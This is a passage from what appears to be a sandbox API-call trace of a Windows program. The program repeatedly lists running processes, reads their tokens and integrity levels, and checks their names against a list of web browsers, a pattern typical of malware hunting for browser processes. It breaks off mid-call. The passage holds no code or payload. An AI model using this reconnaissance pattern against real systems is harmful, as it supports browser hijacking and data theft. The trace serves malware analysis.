[0563.197] GetLastError () returned 0x7a [0563.198] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0563.198] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0563.198] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0563.198] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0563.198] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0563.198] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0563.198] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0563.198] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0563.198] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0563.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0563.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0563.198] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0563.198] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0563.198] GetLastError () returned 0x7a [0563.198] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0563.198] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0563.199] CloseHandle (hObject=0x29c) returned 1 [0563.199] CloseHandle (hObject=0x298) returned 1 [0563.199] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0563.199] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0563.199] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0563.199] GetLastError () returned 0x7a [0563.199] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0563.199] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0563.199] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0563.199] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0563.199] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0563.199] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0563.199] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0563.199] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0563.199] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0563.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0563.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0563.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0563.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0563.200] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0563.200] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0563.200] GetLastError () returned 0x7a [0563.200] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0563.200] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0563.200] CloseHandle (hObject=0x29c) returned 1 [0563.200] CloseHandle (hObject=0x298) returned 1 [0563.200] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0563.200] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0563.200] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0563.200] GetLastError () returned 0x7a [0563.200] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0563.200] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0563.200] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0563.200] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0563.201] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0563.201] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0563.201] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0563.201] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0563.201] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0563.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0563.201] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0563.201] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0565.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9f28) returned 0xc0000004 [0565.212] VirtualAlloc (lpAddress=0x0, dwSize=0xaf28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0565.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaf28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0565.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0565.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0565.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0565.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0565.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0565.216] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0565.216] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0565.216] GetLastError () returned 0x7a [0565.216] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0565.216] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0565.216] CloseHandle (hObject=0x29c) returned 1 [0565.216] CloseHandle (hObject=0x298) returned 1 [0565.217] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0565.217] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0565.217] GetLastError () returned 0x7a [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0565.217] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0565.217] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0565.217] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0565.217] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0565.217] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0565.217] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0565.217] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0565.217] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0565.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0565.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0565.217] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0565.217] GetLastError () returned 0x7a [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0565.217] CloseHandle (hObject=0x29c) returned 1 [0565.217] CloseHandle (hObject=0x298) returned 1 [0565.217] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0565.217] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0565.217] GetLastError () returned 0x7a [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0565.217] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0565.217] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0565.217] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0565.217] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0565.217] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0565.217] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0565.217] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0565.217] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0565.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0565.217] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0565.217] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0565.218] GetLastError () returned 0x7a [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0565.218] CloseHandle (hObject=0x29c) returned 1 [0565.218] CloseHandle (hObject=0x298) returned 1 [0565.218] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0565.218] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0565.218] GetLastError () returned 0x7a [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0565.218] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0565.218] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0565.218] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0565.218] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0565.218] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0565.218] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0565.218] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0565.218] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0565.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0565.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0565.218] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0565.218] GetLastError () returned 0x7a [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0565.218] CloseHandle (hObject=0x29c) returned 1 [0565.218] CloseHandle (hObject=0x298) returned 1 [0565.218] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0565.218] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0565.218] GetLastError () returned 0x7a [0565.218] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0565.218] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0565.218] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0565.218] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0565.218] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0565.218] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0565.219] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0565.219] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0565.219] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0565.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0565.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0565.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0565.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0565.219] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0565.219] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0565.219] GetLastError () returned 0x7a [0565.219] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0565.219] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0565.219] CloseHandle (hObject=0x29c) returned 1 [0565.219] CloseHandle (hObject=0x298) returned 1 [0565.219] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0565.219] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0565.219] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0565.219] GetLastError () returned 0x7a [0565.219] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0565.219] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0565.219] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0565.219] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0565.219] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0565.219] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0565.219] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0565.219] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0565.219] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0565.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0565.219] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0565.220] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0567.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9f28) returned 0xc0000004 [0567.223] VirtualAlloc (lpAddress=0x0, dwSize=0xaf28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0567.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaf28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0567.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0567.224] OpenProcess 